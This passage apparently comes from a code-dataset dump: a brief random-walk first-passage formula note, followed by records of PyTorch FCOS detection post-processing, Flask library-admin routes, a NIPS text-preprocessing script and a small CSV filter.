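On the closing question in monte_carlo.py above: for the first-passage time T of the simulated symmetric ±1 walk to +1, the classical result gives the exact law and its tail, and since the CCDF is 1 − CDF, a CCDF falling like t^(−1/2) differentiates to a density falling like t^(−3/2):

```latex
P(T = 2k-1) = \frac{1}{2k-1}\binom{2k-1}{k}\,2^{-(2k-1)}, \qquad
P(T > t) \sim \sqrt{\frac{2}{\pi t}} \propto t^{-1/2}, \qquad
p_T(t) \sim t^{-3/2}.
```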
per_locations = locations[per_box_loc]\n\n per_pre_nms_top_n = pre_nms_top_n[i]\n\n if per_candidate_inds.sum().item() > per_pre_nms_top_n.item():\n per_box_cls, top_k_indices = \\\n per_box_cls.topk(per_pre_nms_top_n, sorted=False)\n per_class = per_class[top_k_indices]\n per_box_regression = per_box_regression[top_k_indices]\n per_locations = per_locations[top_k_indices]\n\n detections = torch.stack([\n per_locations[:, 0] - per_box_regression[:, 0],\n per_locations[:, 1] - per_box_regression[:, 1],\n per_locations[:, 0] + per_box_regression[:, 2],\n per_locations[:, 1] + per_box_regression[:, 3],\n ], dim=1)\n\n h, w = image_sizes[i]\n boxlist = BoxList(detections, (int(w), int(h)), mode=\"xyxy\")\n boxlist.add_field(\"labels\", per_class)\n boxlist.add_field(\"scores\", per_box_cls)\n boxlist.add_field(\"det_locations\", per_locations)\n boxlist = boxlist.clip_to_image(remove_empty=False)\n boxlist = remove_small_boxes(boxlist, self.min_size)\n results.append(boxlist)\n\n return results\n\n def forward(self, locations, box_cls_set, box_regression, centerness, image_sizes, images=None, targets=None):\n \"\"\"\n Arguments:\n anchors: list[list[BoxList]]\n box_cls: list[tensor]\n box_regression: list[tensor]\n image_sizes: list[(h, w)]\n Returns:\n boxlists (list[BoxList]): the post-processed anchors, after\n applying box decoding and NMS\n \"\"\"\n cascade_num = len(box_cls_set)\n for box_cls in box_cls_set.values():\n fpn_level_num = len(box_cls)\n break\n box_cls_set_level_first = [{} for _ in range(fpn_level_num)]\n for name, box_cls in box_cls_set.items():\n for lvl, cls in enumerate(box_cls):\n box_cls_set_level_first[lvl][name] = cls\n box_cls_set = box_cls_set_level_first\n if centerness is None:\n centerness = [None] * fpn_level_num\n\n show_box_cls = BoxClsShower(fpn_level_num, images=images, targets=targets) if self.vis_labels else None\n\n sampled_boxes = []\n for _, (l, o, b, c) in enumerate(zip(locations, box_cls_set, box_regression, centerness)):\n sampled_boxes.append(\n self.forward_for_single_feature_map(\n l, o, b, c, image_sizes, show_box_cls\n )\n )\n\n boxlists = list(zip(*sampled_boxes))\n boxlists = [cat_boxlist(boxlist) for boxlist in boxlists]\n boxlists = self.select_over_all_levels(boxlists)\n\n return boxlists\n\n # TODO very similar to filter_results from PostProcessor\n # but filter_results is per image\n # TODO Yang: solve this issue in the future. 
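The detection decoding inside `forward_for_single_feature_map` above is the core of FCOS inference: each grid location plus its predicted (l, t, r, b) distances yields an xyxy box. The same math as a standalone helper:

```python
import torch

def decode_fcos_boxes(locations, ltrb):
    """locations: (N, 2) grid points; ltrb: (N, 4) distances to box edges."""
    x, y = locations[:, 0], locations[:, 1]
    return torch.stack([
        x - ltrb[:, 0],  # left
        y - ltrb[:, 1],  # top
        x + ltrb[:, 2],  # right
        y + ltrb[:, 3],  # bottom
    ], dim=1)
```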
No good solution\n # right now.\n def select_over_all_levels(self, boxlists):\n num_images = len(boxlists)\n results = []\n for i in range(num_images):\n scores = boxlists[i].get_field(\"scores\")\n labels = boxlists[i].get_field(\"labels\")\n locations = boxlists[i].get_field(\"det_locations\") # add here\n boxes = boxlists[i].bbox\n boxlist = boxlists[i]\n result = []\n # skip the background\n for j in range(1, self.num_classes):\n inds = (labels == j).nonzero().view(-1)\n\n scores_j = scores[inds]\n boxes_j = boxes[inds, :].view(-1, 4)\n locations_j = locations[inds]\n boxlist_for_class = BoxList(boxes_j, boxlist.size, mode=\"xyxy\")\n boxlist_for_class.add_field(\"scores\", scores_j)\n boxlist_for_class.add_field(\"det_locations\", locations_j) # add here\n boxlist_for_class = boxlist_nms(\n boxlist_for_class, self.nms_thresh,\n score_field=\"scores\"\n )\n num_labels = len(boxlist_for_class)\n boxlist_for_class.add_field(\n \"labels\", torch.full((num_labels,), j,\n dtype=torch.int64,\n device=scores.device)\n )\n result.append(boxlist_for_class)\n\n result = cat_boxlist(result)\n number_of_detections = len(result)\n\n # Limit to max_per_image detections **over all classes**\n if number_of_detections > self.fpn_post_nms_top_n > 0:\n cls_scores = result.get_field(\"scores\")\n image_thresh, _ = torch.kthvalue(\n cls_scores.cpu(),\n number_of_detections - self.fpn_post_nms_top_n + 1\n )\n keep = cls_scores >= image_thresh.item()\n keep = torch.nonzero(keep).squeeze(1)\n result = result[keep]\n results.append(result)\n return results\n\n\ndef make_fcos_postprocessor(config):\n pre_nms_thresh = config.MODEL.FCOS.INFERENCE_TH\n pre_nms_top_n = config.MODEL.FCOS.PRE_NMS_TOP_N\n nms_thresh = config.MODEL.FCOS.NMS_TH\n fpn_post_nms_top_n = config.TEST.DETECTIONS_PER_IMG\n\n box_selector = FCOSPostProcessor(\n pre_nms_thresh=pre_nms_thresh,\n pre_nms_top_n=pre_nms_top_n,\n nms_thresh=nms_thresh,\n fpn_post_nms_top_n=fpn_post_nms_top_n,\n min_size=0,\n num_classes=config.MODEL.FCOS.NUM_CLASSES,\n vis_labels=config.MODEL.FCOS.DEBUG.VIS_LABELS\n )\n\n return box_selector\n\n\nclass BoxClsShower(object):\n \"\"\"\n map0-4: [0.125, 0.25, 0.5, 0.75, 1.0] ** 2 area range\n map5: centerness\n \"\"\"\n def __init__(self, fpn_level=5, scatter_topk=10, EPS=1e-8, images=None, targets=None):\n self.fpn_level = fpn_level\n self.level_count = 0\n self.box_probs = []\n self.scatter_topk = scatter_topk\n self.EPS = EPS\n self.row_sub_fig = 4\n self.single_fig_size = 4\n self.titles = None\n self.images = images\n self.targets = targets\n\n def find_local_max(self, box_prob):\n B, C, H, W = box_prob.shape\n max_prob, idx = F.max_pool2d_with_indices(box_prob, 3, 1, 1, return_indices=True)\n max_prob = max_prob[0, 0]\n box_prob = box_prob[0, 0]\n is_local_max = torch.nonzero(box_prob == max_prob)\n y, x = is_local_max[:, 0], is_local_max[:, 1]\n idx = torch.argsort(-box_prob[y, x])\n k = self.scatter_topk\n y = y[idx[:k]]\n x = x[idx[:k]]\n return y.cpu().numpy(), x.cpu().numpy(), box_prob[y, x]\n\n def mask_to_image(self, box_prob, upsample=False):\n img = self.images.tensors[0:1]\n if upsample:\n box_prob = F.upsample(box_prob[None, None, :, :], img.shape[2:], mode='bilinear')[0, 0]\n else:\n img = F.upsample(img, box_prob.shape, mode='bilinear')\n img = img[0].permute((1, 2, 0)).cpu() + torch.Tensor([102.9801, 115.9465, 122.7717])\n return img * box_prob[:, :, None] / 255\n\n def __call__(self, box_prob_set, N, H, W, C, th):\n import matplotlib.pyplot as plt\n box_probs = []\n for i, box_prob in 
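`find_local_max` above uses a standard peak-detection trick: a point is a local maximum iff it equals the 3x3 max-pool of its own neighborhood. Stripped of the class plumbing:

```python
import torch
import torch.nn.functional as F

def local_maxima(score_map):
    """score_map: (H, W) tensor; returns y and x indices of 3x3 peaks."""
    pooled = F.max_pool2d(score_map[None, None], 3, stride=1, padding=1)[0, 0]
    peaks = torch.nonzero(score_map == pooled)
    return peaks[:, 0], peaks[:, 1]
```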
enumerate(box_prob_set):\n if box_prob.numel() == N*H*W*C:\n box_prob = box_prob.reshape(-1, H, W, C)[:1]\n elif box_prob.numel() == N*H*W:\n box_prob = box_prob.reshape(-1, H, W, 1)[:1]\n box_prob = box_prob.max(dim=-1, keepdim=True)[0].permute((0, 3, 1, 2))\n box_probs.append(box_prob.cpu())\n\n # merge FPN multi-level score map to one map by resize add.\n if len(self.box_probs) == 0:\n self.box_probs = box_probs\n else:\n for i, p in enumerate(box_probs): # for each area th score map\n box_prob = self.box_probs[i]\n if box_prob.numel() < p.numel():\n box_prob = F.upsample(box_prob, p.shape[2:], mode='bilinear')\n else:\n p = F.upsample(p, box_prob.shape[2:], mode='bilinear')\n self.box_probs[i] = torch.max(torch.stack([p, box_prob]), dim=0)[0]\n self.level_count += 1\n\n if self.level_count == self.fpn_level:\n # show each area th score map\n n_figs = len(self.box_probs)\n r = self.row_sub_fig if n_figs >= self.row_sub_fig else n_figs\n c = int(np.ceil((n_figs/r)))\n plt.figure(figsize=(r * self.single_fig_size, c * self.single_fig_size)) # (W, H)\n for i, box_prob in enumerate(self.box_probs):\n y, x, score = self.find_local_max(box_prob)\n box_prob = box_prob[0, 0]\n max_p = box_prob.max()\n std = box_prob.std()\n box_prob /= max_p\n if self.images is not None:\n box_prob = self.mask_to_image(box_prob)\n box_prob = box_prob.numpy()\n plt.subplot(c, r, i+1)\n plt.imshow(box_prob)\n plt.scatter(x, y, color='r', s=20 * score)\n if self.titles is not None:\n title = self.titles[i]\n else:\n title = 'map {}'.format(i)\n plt.title(\"{}, max:{:.2f}, std: {:.2f}\".format(title, float(max_p), float(std)))\n plt.show()\n self.level_count = 0\n del self.box_probs\n self.box_probs = []\n","sub_path":"tiny_benchmark_Salpha/maskrcnn_benchmark/modeling/rpn/cascade_fcos/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":13381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"628786126","text":"from nose.tools import set_trace\nfrom functools import wraps\nimport flask\nfrom flask import (\n Response,\n redirect,\n make_response\n)\nimport os\n\nfrom api.app import app\nfrom api.config import Configuration\n\nfrom core.util.problem_detail import ProblemDetail\nfrom core.app_server import returns_problem_detail\n\nfrom controller import setup_admin_controllers\nfrom templates import (\n admin as admin_template,\n admin_sign_in_again as sign_in_again_template,\n)\n\nimport csv, codecs, cStringIO\nfrom StringIO import StringIO\nimport urllib\n\n# The secret key is used for signing cookies for admin login\napp.secret_key = Configuration.get(Configuration.SECRET_KEY)\n\n@app.before_first_request\ndef setup_admin():\n if getattr(app, 'manager', None) is not None:\n setup_admin_controllers(app.manager)\n\ndef allows_admin_auth_setup(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n setting_up = (app.manager.admin_sign_in_controller.auth == None)\n return f(*args, setting_up=setting_up, **kwargs)\n return decorated\n\ndef requires_admin(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n if 'setting_up' in kwargs:\n setting_up = kwargs.pop('setting_up')\n else:\n setting_up = False\n\n if not setting_up:\n admin = app.manager.admin_sign_in_controller.authenticated_admin_from_request()\n if isinstance(admin, ProblemDetail):\n return app.manager.admin_sign_in_controller.error_response(admin)\n elif isinstance(admin, Response):\n return admin\n\n return f(*args, **kwargs)\n return decorated\n\ndef requires_csrf_token(f):\n 
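The `__call__` above folds FPN levels into one score map by upsampling the coarser map and taking an elementwise max (`F.upsample` is the older spelling of today's `F.interpolate`). The merge step in isolation:

```python
import torch
import torch.nn.functional as F

def merge_score_maps(a, b):
    """a, b: (1, 1, H, W) score maps, possibly at different resolutions."""
    if a.numel() < b.numel():
        a = F.interpolate(a, size=b.shape[2:], mode="bilinear",
                          align_corners=False)
    else:
        b = F.interpolate(b, size=a.shape[2:], mode="bilinear",
                          align_corners=False)
    return torch.max(a, b)  # keep the stronger response at each pixel
```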
@wraps(f)\n def decorated(*args, **kwargs):\n if 'setting_up' in kwargs:\n setting_up = kwargs.get('setting_up')\n else:\n setting_up = False\n if not setting_up and flask.request.method in [\"POST\", \"PUT\", \"DELETE\"]:\n token = app.manager.admin_sign_in_controller.check_csrf_token()\n if isinstance(token, ProblemDetail):\n return token\n return f(*args, **kwargs)\n return decorated\n\n@app.route('/admin/GoogleAuth/callback')\n@returns_problem_detail\ndef google_auth_callback():\n return app.manager.admin_sign_in_controller.redirect_after_sign_in()\n\n@app.route('/admin/sign_in')\n@returns_problem_detail\ndef admin_sign_in():\n return app.manager.admin_sign_in_controller.sign_in()\n\n@app.route('/admin/works///', methods=['GET'])\n@returns_problem_detail\n@requires_admin\ndef work_details(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.details(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////classifications', methods=['GET'])\n@returns_problem_detail\n@requires_admin\ndef work_classifications(data_source, identifier_type, identifier):\n data = app.manager.admin_work_controller.classifications(data_source, identifier_type, identifier)\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/works////complaints', methods=['GET'])\n@returns_problem_detail\n@requires_admin\ndef work_complaints(data_source, identifier_type, identifier):\n data = app.manager.admin_work_controller.complaints(data_source, identifier_type, identifier)\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/works////edit', methods=['POST'])\n@returns_problem_detail\n@requires_admin\ndef edit(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.edit(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////suppress', methods=['POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef suppress(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.suppress(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////unsuppress', methods=['POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef unsuppress(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.unsuppress(data_source, identifier_type, identifier)\n\n@app.route('/works////refresh', methods=['POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef refresh(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.refresh_metadata(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////resolve_complaints', methods=['POST'])\n@returns_problem_detail\n@requires_admin\n@requires_csrf_token\ndef resolve_complaints(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.resolve_complaints(data_source, identifier_type, identifier)\n\n@app.route('/admin/works////edit_classifications', methods=['POST'])\n@returns_problem_detail\n@requires_admin\n@requires_csrf_token\ndef edit_classifications(data_source, identifier_type, identifier):\n return app.manager.admin_work_controller.edit_classifications(data_source, identifier_type, identifier)\n\n@app.route('/admin/complaints')\n@returns_problem_detail\n@requires_admin\ndef complaints():\n return 
app.manager.admin_feed_controller.complaints()\n\n@app.route('/admin/suppressed')\n@returns_problem_detail\n@requires_admin\ndef suppressed():\n \"\"\"Returns a feed of suppressed works.\"\"\"\n return app.manager.admin_feed_controller.suppressed()\n\n@app.route('/admin/genres')\n@returns_problem_detail\n@requires_admin\ndef genres():\n \"\"\"Returns a JSON representation of complete genre tree.\"\"\"\n data = app.manager.admin_feed_controller.genres()\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/bulk_circulation_events')\n@returns_problem_detail\n@requires_admin\ndef bulk_circulation_events():\n \"\"\"Returns a CSV representation of all circulation events with optional\n start and end times.\"\"\"\n data, date = app.manager.admin_dashboard_controller.bulk_circulation_events()\n if isinstance(data, ProblemDetail):\n return data\n\n class UnicodeWriter:\n \"\"\"\n A CSV writer for Unicode data.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n # Redirect output to a queue\n self.queue = StringIO()\n self.writer = csv.writer(self.queue, dialect=dialect, **kwds)\n self.stream = f\n self.encoder = codecs.getincrementalencoder(encoding)()\n\n def writerow(self, row):\n self.writer.writerow(\n [s.encode(\"utf-8\") if hasattr(s, \"encode\") else \"\" for s in row]\n )\n # Fetch UTF-8 output from the queue ...\n data = self.queue.getvalue()\n data = data.decode(\"utf-8\")\n # ... and reencode it into the target encoding\n data = self.encoder.encode(data)\n # write to the target stream\n self.stream.write(data)\n # empty queue\n self.queue.truncate(0)\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n\n output = StringIO()\n writer = UnicodeWriter(output)\n writer.writerows(data)\n response = make_response(output.getvalue())\n response.headers['Content-Disposition'] = \"attachment; filename=circulation_events_\" + date + \".csv\"\n response.headers[\"Content-type\"] = \"text/csv\"\n return response\n\n@app.route('/admin/circulation_events')\n@returns_problem_detail\n@requires_admin\ndef circulation_events():\n \"\"\"Returns a JSON representation of the most recent circulation events.\"\"\"\n data = app.manager.admin_dashboard_controller.circulation_events()\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/stats')\n@returns_problem_detail\n@requires_admin\ndef stats():\n data = app.manager.admin_dashboard_controller.stats()\n if isinstance(data, ProblemDetail):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/libraries', methods=['GET', 'POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef libraries():\n data = app.manager.admin_settings_controller.libraries()\n if isinstance(data, ProblemDetail):\n return data\n if isinstance(data, Response):\n return data\n return flask.jsonify(**data)\n\n@app.route(\"/admin/collections\", methods=['GET', 'POST'])\n@returns_problem_detail\n@requires_csrf_token\n@requires_admin\ndef collections():\n data = app.manager.admin_settings_controller.collections()\n if isinstance(data, ProblemDetail):\n return data\n if isinstance(data, Response):\n return data\n return flask.jsonify(**data)\n\n@app.route(\"/admin/admin_auth_services\", methods=['GET', 'POST'])\n@returns_problem_detail\n@allows_admin_auth_setup\n@requires_csrf_token\n@requires_admin\ndef admin_auth_services():\n data = app.manager.admin_settings_controller.admin_auth_services()\n if 
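`UnicodeWriter` above is the classic Python 2 recipe from the csv module docs (this codebase is Python 2 -- note the `cStringIO` import). On Python 3 the stdlib csv module handles unicode natively, so the whole class collapses to a few lines; a sketch of the modern equivalent:

```python
import csv
import io

def rows_to_csv_bytes(rows, encoding="utf-8"):
    """Serialize rows of (unicode) strings to encoded CSV bytes."""
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue().encode(encoding)
```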
isinstance(data, ProblemDetail):\n return data\n if isinstance(data, Response):\n return data\n return flask.jsonify(**data)\n\n@app.route('/admin/sign_in_again')\ndef admin_sign_in_again():\n \"\"\"Allows an admin with expired credentials to sign back in\n from a new browser tab so they won't lose changes.\n \"\"\"\n admin = app.manager.admin_sign_in_controller.authenticated_admin_from_request()\n csrf_token = app.manager.admin_sign_in_controller.get_csrf_token()\n if isinstance(admin, ProblemDetail) or csrf_token is None or isinstance(csrf_token, ProblemDetail):\n redirect_url = flask.request.url\n return redirect(app.manager.url_for('admin_sign_in', redirect=redirect_url))\n return flask.render_template_string(sign_in_again_template)\n\n@app.route('/admin/web')\n@app.route('/admin/web/')\n@app.route('/admin/web/collection//book/')\n@app.route('/admin/web/collection/')\n@app.route('/admin/web/book/')\n@app.route('/admin/web/') # catchall for single-page URLs\ndef admin_view(collection=None, book=None, **kwargs):\n setting_up = (app.manager.admin_sign_in_controller.auth == None)\n if not setting_up:\n admin = app.manager.admin_sign_in_controller.authenticated_admin_from_request()\n csrf_token = app.manager.admin_sign_in_controller.get_csrf_token()\n if isinstance(admin, ProblemDetail) or csrf_token is None or isinstance(csrf_token, ProblemDetail):\n redirect_url = flask.request.url\n if (collection):\n quoted_collection = urllib.quote(collection)\n redirect_url = redirect_url.replace(\n quoted_collection,\n quoted_collection.replace(\"/\", \"%2F\"))\n if (book):\n quoted_book = urllib.quote(book)\n redirect_url = redirect_url.replace(\n quoted_book,\n quoted_book.replace(\"/\", \"%2F\"))\n return redirect(app.manager.url_for('admin_sign_in', redirect=redirect_url))\n else:\n csrf_token = None\n show_circ_events_download = (\n \"core.local_analytics_provider\" in (Configuration.policy(\"analytics\") or [])\n )\n return flask.render_template_string(\n admin_template,\n csrf_token=csrf_token,\n home_url=app.manager.url_for('acquisition_groups'),\n show_circ_events_download=show_circ_events_download,\n setting_up=setting_up,\n )\n\n@app.route('/admin')\n@app.route('/admin/')\ndef admin_base(**kwargs):\n return redirect(app.manager.url_for('admin_view'))\n\n@app.route('/admin/static/circulation-web.js')\n@returns_problem_detail\ndef admin_js():\n directory = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"node_modules\", \"simplified-circulation-web\", \"dist\")\n return flask.send_from_directory(directory, \"circulation-web.js\")\n\n@app.route('/admin/static/circulation-web.css')\n@returns_problem_detail\ndef admin_css():\n directory = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"node_modules\", \"simplified-circulation-web\", \"dist\")\n return flask.send_from_directory(directory, \"circulation-web.css\")\n\n","sub_path":"api/admin/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":12562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"144522334","text":"# -*- coding: utf-8 -*-\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport random\nfrom scipy import sparse\nimport itertools\nfrom scipy.io import savemat, loadmat\nimport re\nimport string\nimport sys\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser(description='nips 
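`admin_view` above re-encodes `/` inside collection and book identifiers so each survives as a single path segment in the redirect URL. The two-step quote-then-replace is equivalent to quoting with no safe characters:

```python
import urllib  # Python 2, as in this codebase

urllib.quote("a/b")           # -> 'a/b'   ('/' is safe by default)
urllib.quote("a/b", safe="")  # -> 'a%2Fb' (what the replace() achieves)
```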
preprocessing')\n\nparser.add_argument('--folds', type=int, default=3, help='number of folds')\nparser.add_argument('--data_path', type=str, help='directory containing data')\nparser.add_argument('--split', type=float, help='percentage of test data')\n\nargs = parser.parse_args()\n\n# Maximum / minimum document frequency\nmax_df = 0.7\nmin_df = 100 # choose desired value for min_df\n\n# Read stopwords\nwith open('stops.txt', 'r') as f:\n stops = f.read().split('\\n')\n\n# Read data\nprint('reading text file...')\ndata_file = '../../data/papers.csv'\ninit_docs = list(pd.read_csv(data_file)['paper_text'])\n\ninit_docs = [re.findall(r'''[\\w']+|[.,!?;-~{}`´_<=>:/@*()&'$%#\"]''', init_docs[doc]) for doc in range(len(init_docs))]\n\ndef contains_punctuation(w):\n return any(char in string.punctuation for char in w)\n\ndef contains_numeric(w):\n return any(char.isdigit() for char in w)\n \n# Remove documents with length less than 10 and greater than 95th percentile.\ndef remove_outlier(docs):\n lengths = np.array([len(doc) for doc in docs])\n docs = [docs[i] for i in np.where((lengths > 10) & (lengths < np.percentile(lengths, 95)))[0]]\n\n return docs\n\n# Removes all words with any punctuation or digits in them.\ninit_docs = [[w.lower() for w in init_docs[doc] if not contains_punctuation(w)] for doc in range(len(init_docs))]\ninit_docs = [[w for w in init_docs[doc] if not contains_numeric(w)] for doc in range(len(init_docs))]\ninit_docs = [[w for w in init_docs[doc] if len(w)>1] for doc in range(len(init_docs))]\ninit_docs = [\" \".join(init_docs[doc]) for doc in range(len(init_docs))]\n\n# Create count vectorizer\nprint('counting document frequency of words...')\ncvectorizer = CountVectorizer(min_df=min_df, max_df=max_df, stop_words=None)\ncvz = cvectorizer.fit_transform(init_docs).sign()\n\n# Get vocabulary\nprint('building the vocabulary...')\nsum_counts = np.asarray(cvz.sum(axis=0))[0]\nv_size = sum_counts.shape[0]\nprint('initial vocabulary size: {}'.format(v_size))\n\n# Sort elements in vocabulary and also remove stop words from the list\nvocab = sorted([(i, word) for i, word in enumerate(cvectorizer.vocabulary_) if word not in stops], key=lambda x: x[0])\nvocab = [w for i, w in vocab]\ndel cvectorizer\n\n# Split in train/test/valid\nprint('tokenizing documents and splitting into train/test/valid...')\ntsSize = int(len(init_docs) * args.split)\nnum_docs_tr = trSize = len(init_docs) - tsSize\n\n#idx_permute = np.random.permutation(num_docs_tr).astype(int)\nidx_permute = np.arange(num_docs_tr)\n\n# Remove words not in train_data\nvocab = list(set([w for idx_d in range(trSize) for w in init_docs[idx_permute[idx_d]].split() if w in vocab]))\nword2id = dict([(w, j) for j, w in enumerate(vocab)])\nid2word = dict([(j, w) for j, w in enumerate(vocab)])\nprint('vocabulary after removing words not in train: {}'.format(len(vocab)))\n\n# Split in train/test/valid\ndocs_tr = [[word2id[w] for w in init_docs[idx_permute[idx_d]].split() if w in word2id] for idx_d in range(trSize)]\ndocs_ts = [[word2id[w] for w in init_docs[idx_d+num_docs_tr].split() if w in word2id] for idx_d in range(tsSize)]\n\n# Remove empty documents\nprint('removing empty documents...')\n\ndef remove_empty(in_docs):\n return [doc for doc in in_docs if doc!=[]]\n\ndocs_tr = remove_empty(docs_tr)\ndocs_ts = remove_empty(docs_ts)\n\n# Remove test documents with length=1\ndocs_ts = [doc for doc in docs_ts if len(doc)>1]\n\n# Split test set in 2 halves\nprint('splitting test and validation documents in 2 halves...')\ndocs_ts_h1 = [[w for 
i,w in enumerate(doc) if i<=len(doc)/2.0-1] for doc in docs_ts]\ndocs_ts_h2 = [[w for i,w in enumerate(doc) if i>len(doc)/2.0-1] for doc in docs_ts]\n\n# Get doc indices\nprint('getting doc indices...')\n\ndef create_doc_indices(in_docs):\n aux = [[j for i in range(len(doc))] for j, doc in enumerate(in_docs)]\n return [int(x) for y in aux for x in y]\n\ndoc_indices_tr = create_doc_indices(docs_tr)\ndoc_indices_ts_h1 = create_doc_indices(docs_ts_h1)\ndoc_indices_ts_h2 = create_doc_indices(docs_ts_h2)\n\n# Number of documents in each set\nn_docs_ts_h1 = len(docs_ts_h1)\nn_docs_ts_h2 = len(docs_ts_h2)\n\n# Create bow representation\nprint('creating bow representation...')\n\ndef create_list_words(in_docs):\n return [x for y in in_docs for x in y]\n\ndef create_bow(doc_indices, words, n_docs, vocab_size):\n return sparse.coo_matrix(([1]*len(doc_indices),(doc_indices, words)), shape=(n_docs, vocab_size)).tocsr()\n\nbow_ts_h1 = create_bow(doc_indices_ts_h1, create_list_words(docs_ts_h1), n_docs_ts_h1, len(vocab))\nbow_ts_h2 = create_bow(doc_indices_ts_h2, create_list_words(docs_ts_h2), n_docs_ts_h2, len(vocab))\n\n# Remove unused variables\ndel docs_ts_h1\ndel docs_ts_h2\ndel doc_indices_ts_h1\ndel doc_indices_ts_h2\n\n# Write the vocabulary to a file\nif not os.path.isdir(args.data_path):\n os.system('mkdir -p ' + args.data_path)\n\nwith open(args.data_path + 'vocab.pkl', 'wb') as f:\n pickle.dump(vocab, f)\n\ndef save_data(x, mode, path_save):\n \n x = x.toarray()\n docs = []\n for d in x:\n\n doc = []\n for index in list(d.nonzero()[0]):\n doc += d[index] * [index]\n\n docs.append(np.array(doc))\n\n docs = np.array(docs)\n np.save(os.path.join(path_save, mode + '.txt.npy'), docs)\n\n# Split bow intro token/value pairs\nprint('splitting bow intro token/value pairs and saving to disk...')\n\ndef split_bow(bow_in, n_docs):\n indices = [[w for w in bow_in[doc,:].indices] for doc in range(n_docs)]\n counts = [[c for c in bow_in[doc,:].data] for doc in range(n_docs)]\n return indices, counts\n\nkf = KFold(n_splits=args.folds)\n\nfor fold, indices in enumerate(kf.split(docs_tr)):\n\n print(\"Creating fold: \", fold) \n fold_path = args.data_path + 'fold' + str(fold) + '/'\n if not os.path.isdir(fold_path):\n os.system('mkdir -p ' + fold_path)\n\n train, valid = [docs_tr[i] for i in indices[0]], [docs_tr[i] for i in indices[1]]\n print('number of documents (train): {}'.format(len(train)))\n\n train_indices = create_doc_indices(train)\n bow_tr = create_bow(train_indices, create_list_words(train), len(train), len(vocab)) \n save_data(bow_tr, 'train', fold_path)\n\n pre_valid_h1 = [[w for i,w in enumerate(doc) if i<=len(doc)//2] for doc in valid]\n pre_valid_h2 = [[w for i,w in enumerate(doc) if i>len(doc)//2] for doc in valid]\n\n valid_h1 = []\n valid_h2 = []\n \n for x, y in zip(pre_valid_h1, pre_valid_h2):\n if len(x) != 0 and len(y) != 0:\n valid_h1.append(x)\n valid_h2.append(y)\n\n print('number of documents (valid): {}'.format(len(valid_h1)))\n valid_h1_indices = create_doc_indices(valid_h1)\n bow_va_h1 = create_bow(valid_h1_indices, create_list_words(valid_h1), len(valid_h1), len(vocab))\n save_data(bow_va_h1, 'valid_h1', fold_path)\n\n valid_h2_indices = create_doc_indices(valid_h2)\n bow_va_h2 = create_bow(valid_h2_indices, create_list_words(valid_h2), len(valid_h2), len(vocab))\n save_data(bow_va_h2, 'valid_h2', fold_path)\n \n del train\n del train_indices\n del bow_tr\n del valid_h1\n del valid_h1_indices\n del bow_va_h1\n del valid_h2\n del valid_h2_indices\n del 
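`create_bow` above assembles the bag-of-words matrix from parallel lists of document indices and word ids; `scipy.sparse.coo_matrix` sums duplicate (doc, word) pairs, which is what makes the counts come out right. A tiny worked example of the same call:

```python
from scipy import sparse

doc_indices = [0, 0, 0, 1]  # doc 0 has three tokens, doc 1 has one
words       = [5, 7, 5, 2]  # their vocabulary ids
bow = sparse.coo_matrix(([1] * len(words), (doc_indices, words)),
                        shape=(2, 10)).tocsr()
assert bow[0, 5] == 2       # duplicate (0, 5) entries were summed
assert bow[0, 7] == 1 and bow[1, 2] == 1
```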
bow_va_h2\n\nsave_data(bow_ts_h1, 'test_h1', args.data_path)\nsave_data(bow_ts_h2, 'test_h2', args.data_path)\nprint('Data ready !!')\n","sub_path":"scripts/data_nips_cv.py","file_name":"data_nips_cv.py","file_ext":"py","file_size_in_byte":7635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"284829734","text":"import csv\n\nfiles = range(1,13)\n\nfor f in files:\n\tpath = '../data/2008/2008-%s.csv' % f\n\tf = open(path, 'rb')\n\tdata = csv.DictReader(f)\n\n\tdictFile = open('../data/cleanedData/2008LatLng.json', 'ab')\n\tfor d in data:\n\t\tif 'PHOENIX, AZ' in d['Address']:\n\t\t\tnewLine = str(d)\n\t\t\tnewLine += '\\n'\n\t\t\tdictFile.write(newLine)","sub_path":"tools/2008CleanCsv.py","file_name":"2008CleanCsv.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"522856496","text":"# Copyright 2014 Huawei Technologies Co. Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file 